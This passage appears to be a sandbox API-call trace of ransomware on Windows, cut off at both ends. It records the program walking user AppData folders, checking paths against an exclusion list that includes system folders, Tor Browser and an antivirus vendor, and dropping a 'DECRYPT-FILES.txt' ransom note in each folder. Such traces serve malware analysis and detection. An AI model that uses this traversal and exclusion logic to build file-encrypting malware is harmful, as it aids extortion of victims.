ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.312] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.312] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.312] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.312] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.312] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0186.312] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0186.312] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0186.312] lstrcatW (in: lpString1="RSA", lpString2="\\" | out: lpString1="RSA\\") returned="RSA\\" [0186.312] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Program Files") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch=":\\Windows") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Games\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\All Users") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="AhnLab") returned 0x0 [0186.312] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.312] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0186.312] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.312] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\0a16c9.tmp") returned 65 [0186.312] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.312] GetLastError () returned 0x5 [0186.313] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0186.313] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.313] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt") returned 72 [0186.313] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.313] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0186.313] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0186.313] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.314] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.314] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.314] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.314] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.314] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.314] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.314] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.314] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.314] CloseHandle (hObject=0xffffffff) returned 0 [0186.314] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA\\", cAlternateFileName="")) returned 0 [0186.314] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.314] CloseHandle (hObject=0xffffffff) returned 0 [0186.314] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.314] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.314] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0186.314] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0186.314] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0186.314] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0186.314] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Program Files") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch=":\\Windows") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Games\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\All Users") returned 0x0 [0186.314] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.315] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.315] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.315] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="AhnLab") returned 0x0 [0186.315] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.315] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0186.315] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.315] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\0a16c9.tmp") returned 72 [0186.315] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.321] GetLastError () returned 0x5 [0186.321] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0186.321] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.321] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt") returned 79 [0186.321] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.322] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 61 [0186.322] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0186.322] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.323] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.323] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.323] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a41560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.323] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.323] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0186.323] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0186.323] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0186.323] lstrcatW (in: lpString1="Quick Launch", lpString2="\\" | out: lpString1="Quick Launch\\") returned="Quick Launch\\" [0186.323] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="Quick Launch\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0186.323] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Program Files") returned 0x0 [0186.323] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch=":\\Windows") returned 0x0 [0186.323] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Games\\") returned 0x0 [0186.323] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.323] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\All Users") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="AhnLab") returned 0x0 [0186.324] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.324] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0186.324] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.324] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\0a16c9.tmp") returned 85 [0186.324] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.330] GetLastError () returned 0x5 [0186.330] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0186.330] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.330] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt") returned 92 [0186.330] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.331] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned 74 [0186.331] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0186.331] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.332] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.332] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.332] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.332] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a41560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a41560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a41560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.332] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.332] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de4960a, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e1692f0, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.332] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.332] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.332] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.332] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.332] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de234aa, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0186.332] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.332] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="autorun.inf") returned 1 [0186.332] lstrcmpiW (lpString1="Shows 